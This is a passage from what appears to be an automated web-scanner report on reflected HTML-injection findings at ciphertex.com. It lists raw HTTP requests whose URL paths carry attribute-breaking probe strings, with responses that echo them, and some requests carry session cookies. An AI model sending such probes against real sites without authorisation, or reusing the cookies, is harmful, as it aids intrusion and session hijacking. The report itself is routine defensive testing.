Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-theme-content-module.cssee26c"><a>7338ae6f861" class="section-sites sidebar-none">
...[SNIP]...

2.65. http://www.ciphertex.com/sites/all/modules/custom_module/ciphertex.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/custom_module/ciphertex.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13980"><a>17c7c4d864f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/custom_module/ciphertex.js13980"><a>17c7c4d864f?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:07 GMT
Vary: Accept-Encoding
Content-Length: 10037
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-custom_module-ciphertex.js13980"><a>17c7c4d864f" class="section-sites sidebar-none">
...[SNIP]...

2.66. http://www.ciphertex.com/sites/all/modules/date/date_popup/themes/jquery.timeentry.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/date/date_popup/themes/jquery.timeentry.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8009"><a>5c6d01fe2e4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/date/d8009"><a>5c6d01fe2e4/themes/jquery.timeentry.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:55 GMT
Vary: Accept-Encoding
Content-Length: 10051
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-date-d8009"><a>5c6d01fe2e4-themes-jquery.timeentry.css" class="section-sites sidebar-none">
...[SNIP]...

2.67. http://www.ciphertex.com/sites/all/modules/filefield/filefield.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac75c"><a>660fd2b4a63 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/filefieldac75c"><a>660fd2b4a63/filefield.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:09 GMT
Vary: Accept-Encoding
Content-Length: 10031
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-filefieldac75c"><a>660fd2b4a63-filefield.css" class="section-sites sidebar-none">
...[SNIP]...

2.68. http://www.ciphertex.com/sites/all/modules/galleria/inc/galleria.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/galleria/inc/galleria.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31b37"><a>f41e3e3235 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites31b37"><a>f41e3e3235/all/modules/galleria/inc/galleria.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:14 GMT
Vary: Accept-Encoding
Content-Length: 10053
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites31b37"><a>f41e3e3235-all-modules-galleria-inc-galleria.css" class="section-sites31b37">
...[SNIP]...

2.69. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/jquery_update/replace/jquery.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6700"><a>633fc2753a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a6700"><a>633fc2753a2/all/modules/jquery_update/replace/jquery.min.js?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:29 GMT
Vary: Accept-Encoding
Content-Length: 10061
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-a6700"><a>633fc2753a2-all-modules-jquery_update-replace-jquery.min.js" class="section-a6700">
...[SNIP]...

2.70. http://www.ciphertex.com/sites/all/modules/jquery_update/replace/jquery.min.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/jquery_update/replace/jquery.min.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 733fd"><a>90f5d522738 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/jquery_update/replace/jquery.min.js733fd"><a>90f5d522738?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:08 GMT
Vary: Accept-Encoding
Content-Length: 10055
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-jquery_update-replace-jquery.min.js733fd"><a>90f5d522738" class="section-sites sidebar-none">
...[SNIP]...

2.71. http://www.ciphertex.com/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9925"><a>9bfb48c88ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitese9925"><a>9bfb48c88ba/all/modules/logintoboggan/logintoboggan.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:31 GMT
Vary: Accept-Encoding
Content-Length: 10068
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sitese9925"><a>9bfb48c88ba-all-modules-logintoboggan-logintoboggan.css" class="section-sitese9925">
...[SNIP]...

2.72. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58eb2"><a>af294686ceb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /58eb2"><a>af294686ceb/all/modules/print/css/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:25 GMT
Vary: Accept-Encoding
Content-Length: 10039
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-58eb2"><a>af294686ceb-all-modules-print-css-printlinks.css" class="section-58eb2">
...[SNIP]...

2.73. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63f63"><a>93577d2105f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules63f63"><a>93577d2105f/print/css/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:36 GMT
Vary: Accept-Encoding
Content-Length: 10033
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules63f63"><a>93577d2105f-print-css-printlinks.css" class="section-sites sidebar-none">
...[SNIP]...

2.74. http://www.ciphertex.com/sites/all/modules/print/css/printlinks.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/print/css/printlinks.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56553"><a>a1c944e5b2e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/print/56553"><a>a1c944e5b2e/printlinks.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:51 GMT
Vary: Accept-Encoding
Content-Length: 10027
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-print-56553"><a>a1c944e5b2e-printlinks.css" class="section-sites sidebar-none">
...[SNIP]...

2.75. http://www.ciphertex.com/sites/all/modules/tabs/drupal-tabs.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/tabs/drupal-tabs.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94af3"><a>651da2295d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites94af3"><a>651da2295d2/all/modules/tabs/drupal-tabs.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/CX-RANGER-E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:57 GMT
Vary: Accept-Encoding
Content-Length: 10046
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites94af3"><a>651da2295d2-all-modules-tabs-drupal-tabs.css" class="section-sites94af3">
...[SNIP]...

2.76. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73aab"><a>cc61c204163 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart73aab"><a>cc61c204163/shipping/uc_quote/uc_quote.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:43:04 GMT
Vary: Accept-Encoding
Content-Length: 10063
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart73aab"><a>cc61c204163-shipping-uc_quote-uc_quote.css" class="section-sites sidebar-none">
...[SNIP]...

2.77. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1a5e"><a>6fbabd2ed7f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/shipping/uc_quoteb1a5e"><a>6fbabd2ed7f/uc_quote.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:19 GMT
Vary: Accept-Encoding
Content-Length: 10063
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-ubercart-shipping-uc_quoteb1a5e"><a>6fbabd2ed7f-uc_quote.css" class="section-sites sidebar-none">
...[SNIP]...

2.78. http://www.ciphertex.com/sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/ubercart/shipping/uc_quote/uc_quote.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78f82"><a>e24ed7b784c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/ubercart/shipping/uc_quote/78f82"><a>e24ed7b784c?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:26 GMT
Vary: Accept-Encoding
